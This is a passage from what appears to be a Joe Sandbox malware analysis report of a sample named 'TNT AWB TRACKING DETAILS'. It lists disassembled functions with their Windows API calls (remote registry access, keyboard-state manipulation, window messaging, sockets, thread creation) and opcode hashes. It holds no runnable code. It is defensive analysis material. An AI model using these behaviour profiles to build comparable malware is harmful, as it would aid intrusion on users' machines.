                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                      • String ID:
                                      • API String ID: 4082120231-0
                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                      Function 0046B280 Relevance: 10.7, APIs: 7, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                      • String ID:
                                      • API String ID: 2027346449-0
                                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                      Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetMenu.USER32 ref: 0047A703
                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                      • _wcslen.LIBCMT ref: 0047A79E
                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                      • String ID:
                                      • API String ID: 3257027151-0
                                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                      Function 0046D230 Relevance: 10.7, APIs: 7, Instructions: 170networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastselect
                                      • String ID:
                                      • API String ID: 215497628-0
                                      • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                      • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                      Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 0044443B
                                      • GetKeyboardState.USER32(?), ref: 00444450
                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                      Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32(?), ref: 00444633
                                      • GetKeyboardState.USER32(?), ref: 00444648
                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                      Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                      • String ID:
                                      • API String ID: 2354583917-0
                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                      Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                      Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageMoveSend
                                      • String ID:
                                      • API String ID: 896007046-0
                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                      Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                      • GetFocus.USER32 ref: 00448ACF
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$FocusMessageSend
                                      • String ID:
                                      • API String ID: 3429747543-0
                                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                      Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                      • __swprintf.LIBCMT ref: 0045D4E9
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu$\VH
                                      • API String ID: 3164766367-2432546070
                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                      Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Msctls_Progress32
                                      • API String ID: 3850602802-3636473452
                                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                      Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                      • String ID:
                                      • API String ID: 3985565216-0
                                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                      Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0041F707
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _free.LIBCMT ref: 0041F71A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID: [B
                                      • API String ID: 1020059152-632041663
                                      • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                      • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                      Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
